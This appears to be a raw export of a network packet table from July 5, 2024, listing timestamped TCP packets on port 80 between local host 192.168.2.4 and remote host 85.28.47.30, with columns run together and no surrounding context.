                                                                Jul 5, 2024 04:36:06.917191029 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917224884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917234898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917244911 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917268991 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917287111 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917327881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917346001 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917356014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917368889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917377949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917391062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917397022 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917404890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917409897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917434931 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917447090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917500019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917520046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917531013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917541981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917552948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917562962 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917565107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917574883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917586088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917594910 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917604923 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917617083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917623997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917629004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917645931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917655945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917673111 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917692900 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917740107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917751074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917762041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917782068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917785883 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917793989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917804956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917805910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917831898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917841911 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917872906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917882919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917891979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917901993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917920113 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917932987 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917958975 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917963028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917983055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.917994022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918004990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918015003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918025017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918044090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918066025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918075085 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918085098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918095112 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918104887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918114901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918123007 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918127060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918149948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918157101 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918176889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918186903 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918196917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918227911 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918241978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918262005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918272018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918282032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918308020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918323040 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918395042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918406963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918416977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918426991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918437004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918447018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918448925 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918458939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918471098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918478012 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918488026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918513060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918545961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918555975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918565989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918576002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918605089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918615103 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918636084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918647051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918657064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918667078 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918678045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918682098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918709993 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918718100 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918734074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918744087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918752909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.918781996 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.918807030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.007287025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.007304907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.007317066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.007335901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.007343054 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.007344007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.007349014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.007356882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.007363081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.007369995 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.007433891 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.007833958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.007884979 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.007890940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.007904053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.007924080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.007935047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.007936001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.007945061 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.007946968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.007960081 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.007960081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.007997990 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008013964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008023024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008025885 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008038998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008053064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008068085 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008080959 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008167028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008177996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008219004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008251905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008265018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008276939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008286953 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008300066 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008327007 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008393049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008404016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008414984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008425951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008435011 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008438110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008457899 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008464098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008474112 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008479118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008497000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008501053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008507967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008519888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008519888 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008532047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008533955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008546114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008548975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008560896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008560896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008575916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008577108 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008588076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008596897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008605003 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008606911 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008620977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008626938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008630991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008650064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008657932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008658886 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008671999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008681059 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008683920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008692980 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008697987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008707047 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008709908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.008723974 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008742094 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008759022 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.008972883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009021997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009026051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009040117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009078026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009108067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009119034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009130955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009161949 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009183884 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009191990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009202957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009215117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009227991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009238958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009238958 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009253025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009269953 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009282112 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009282112 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009293079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009313107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009336948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009371042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009382963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009392977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009402990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009418964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009423018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009435892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009447098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009448051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009459972 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009465933 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009470940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009495974 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009517908 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009550095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009562016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009573936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009586096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009599924 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009608984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009614944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009619951 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009658098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009666920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009679079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009691000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009701014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009708881 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009713888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009722948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009728909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009751081 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009767056 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009774923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009787083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009798050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009809971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009815931 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009824038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009844065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009867907 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009906054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009917021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009926081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009942055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009953022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009957075 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009967089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.009972095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009984970 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.009998083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010023117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010044098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010054111 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010072947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010085106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010094881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010118961 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010123014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010135889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010143995 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010148048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010158062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010165930 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010188103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010190010 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010199070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010216951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010229111 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010237932 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010241032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010248899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010284901 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010303974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010315895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010328054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010339975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010350943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010360956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010379076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010390043 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010417938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010451078 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010462999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010473967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010485888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010495901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010508060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010514975 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010535955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010552883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010564089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010571003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010576010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010588884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010601044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.010610104 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010646105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.010646105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.098978996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099037886 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.099093914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099106073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099117041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099128962 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099139929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099149942 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.099153996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099167109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099179983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099188089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.099206924 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.099222898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.099586010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099606991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099617004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099637985 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.099648952 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.099670887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099683046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099709034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099720955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.099720955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099735022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.099751949 CEST4973080192.168.2.485.28.47.30
